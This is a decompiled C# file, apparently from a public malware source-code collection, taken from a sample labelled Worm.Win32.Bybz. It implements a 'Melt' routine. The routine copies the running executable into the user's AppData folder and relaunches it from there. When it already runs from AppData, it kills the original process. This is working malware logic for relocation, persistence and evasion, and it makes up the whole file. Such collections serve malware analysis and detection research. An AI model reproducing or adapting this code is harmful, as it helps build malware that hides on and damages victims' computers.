MalwareSourceCode/MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/Melt.cs

40 lines
1.3 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.Melt
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Windows.Forms;
namespace ajhfsdlhjasnagfgewfwsg
{
[StandardModule]
internal sealed class Melt
{
public static void Melt(string F)
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
if (Operators.CompareString(Application.StartupPath, folderPath, false) != 0)
{
FileSystem.FileCopy(Application.ExecutablePath, folderPath + "\\" + F);
Interaction.Shell(folderPath + "\\" + F + " " + Application.ExecutablePath);
ProjectData.EndApp();
}
else
{
Process[] processesByName = Process.GetProcessesByName(Interaction.Command());
int index = 0;
while (index < processesByName.Length)
{
processesByName[index].Kill();
checked { ++index; }
}
}
}
}
}